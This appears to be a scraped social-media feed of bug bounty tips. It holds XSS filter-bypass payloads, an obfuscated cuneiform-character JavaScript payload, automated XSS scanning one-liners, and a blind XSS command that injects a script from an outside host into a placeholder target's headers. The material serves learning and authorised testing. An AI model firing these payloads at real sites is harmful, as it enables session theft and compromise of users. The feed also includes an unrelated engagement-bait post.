Madhu Palle

Started to learn bug bounty hunting . As part of it today I have learned how to bypass 2FA Auth. 3 days back I have submitted a bug that is related to reflected xss . It is currently triaged. Hope for the best. #BugBounty #ethicalhacking #hacking

Everything happens for a reason

echo "testphp.vulnweb.com" | gau | gf xss | uro | httpx -silent | Gxss -p Rxss | dalfox pipe echo "testphp.vulnweb.com" | gau | qsreplace '<sCript>confirm(1)</sCript>' | xsschecker -match '<sCript>confirm(1)</sCript>' -vuln

TIL: HTML comments work as single-line-comments in JavaScript context 🤯 <script> <!-- test --> alert(1); alert(2); </script> Only alert(2) is executed. #HTML #LegacyStuff #XSS

Basic XSS Encoding Tips 1) alert = window["al"+"ert"] 2) bypass () with `` 3) replace space with / 4) encode symbols: < = %3c > = %3e " = %22 [ = %5b ] = %5d ` = %60 Example Payload: %3csvg/onload=window%5b"al"+"ert"%5d`1337`%3e By:@grumpzsux #BugBounty #bugbountytips

@intigriti <imsvgg src=/ onsvgerror="alert;throw 1337;">

4 platforms for beginners to practice hacking 👇

Here are XSS Payloads To Bypass Firewall Credit/source- @Pwn4arn

📢a XSS payload, Cuneiform-alphabet based ! 𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++], 𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀] +(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀] +𒀟][𒁹](𒀃[𒀀]+𒀃[𒈫]+𒉺[𒀆]+𒀟+𒌐+"(𒀀)")() #bugbounty #bugbountytips

Make sure you don't miss out this amazing piece of content from @bug_vs_me Blog link-hacklido.com/blog/476-all-a…

Happy Hunting!!!! ☄️☄️ Extension that will help you in Bug Hunting :) 1.THis extension help you to finding hidden api keys in websites. addons.mozilla.org/en-US/firefox/… 2.THis extension is for using burpsuite or any other proxy capture (mitm) application. addons.mozilla.org/en-US/firefox/… 3.THis extension will help you to find which technology running on website. addons.mozilla.org/en-US/firefox/… 4.THis extension used for tempmail service in fast and easy way. addons.mozilla.org/en-US/firefox/… 5.THis extension used for finding all email from the website best use for submitting report on public programs.. addons.mozilla.org/en-US/firefox/… 6.THis extension give you all useful paylaod for testing site in easy way. addons.mozilla.org/en-US/firefox/… 7.THis is best extension for cookie editor also this will tell you site http only or secure flag flag set or not. addons.mozilla.org/en-US/firefox/… another alternative: cookie-editor.com 8.THis extension is best use for protecting your vpn ip from webrtc exposer. addons.mozilla.org/en-US/firefox/… 9.THis extension used for fetching all domains and links from websites and google results. addons.mozilla.org/en-US/firefox/… 10.THis extension used for finding hidden possible parameter or secret keys. addons.mozilla.org/en-US/firefox/… 11.THis extension will help you to find .git files in website easy p1 Information disclosure. addons.mozilla.org/en-US/firefox/… 12.THis extension used for opening multiple sites in one time. addons.mozilla.org/en-US/firefox/… 13.THis extensioin is best use for blocking irritating ads or trackers on sites. addons.mozilla.org/en-US/firefox/… 14.THis extension will protect your eyes better use for night time while hunting. addons.mozilla.org/en-US/firefox/… 15.THis extension used for switching user-agent better for testing site with many user-agents. addons.mozilla.org/en-US/firefox/… 16.THis extension tell you all vulnerable javascript library. addons.mozilla.org/en-US/firefox/… 17.THis extension is used to translates all languages in websites. addons.mozilla.org/en-US/firefox/… 18.THis extension fetch all urls from waybackmachines same like waybackurls addons.mozilla.org/en-US/firefox/… 19.SponsorBlock lets you skip over sponsors, intros, outros, subscription reminders, and other annoying parts of YouTube videos. addons.mozilla.org/en-US/firefox/… #bugbountytip #bugbountytips #BugBounty

The powerful checklist for doing bug bounty or pentesting assessment It's @owasp based checklist and has 500+ Test Cases hariprasaanth.notion.site/hariprasaanth/…

MySQL Blind (Time Based) Payload List #BugBounty #bugbountytips

𝗕𝗹𝗶𝗻𝗱 𝗫𝗦𝗦 𝗶𝗻 𝗫-𝗙𝗼𝗿𝘄𝗮𝗿𝗱𝗲𝗱-𝗛𝗼𝘀𝘁 𝗛𝗲𝗮𝗱𝗲𝗿 findomain -t TARGET.COM | gau | bxss -payload '"><script src=chirag.bxss.in></script>' -header "X-Forwarded-For" Access Oneliners from Github: github.com/thecybertix/On… #bugbountytips #hacks

𝗕𝗹𝗶𝗻𝗱 𝗫𝗦𝗦 𝗶𝗻 𝗫-𝗙𝗼𝗿𝘄𝗮𝗿𝗱𝗲𝗱-𝗛𝗼𝘀𝘁 𝗛𝗲𝗮𝗱𝗲𝗿 findomain -t TARGET.COM | gau | bxss -payload '"><script src=chirag.bxss.in></script>' -header "X-Forwarded-For" github.com/thecybertix/On… By:@thecybertix #BugBounty #bugbountytips

A mind map for SSRF

Most people suck at HR Round but not anymore. I have curated the List of "50 Best HR Round Interview Questions Guide". I usually sell for $99 but for the next 24 hours it's FREE Just: 1. Repost 2. Follow @lax97981 3. Like & Comment "HR" And I will DM you for FREE

We found a Gem Mindmaps to help bug bounty Hunters, pentesters, and offensive/defensive security Professionals github.com/imran-parray/M…

Today I learned about the SQL Injection concept #bugbountytips #bugbounty #ethicalhacking

Today I learned about os commands injection in the web security academy @WebSecAcademy I didnt get much time to prepare. Hope for the better tomorrow 💆🏻 #BugBounty #ethicalhacking #learn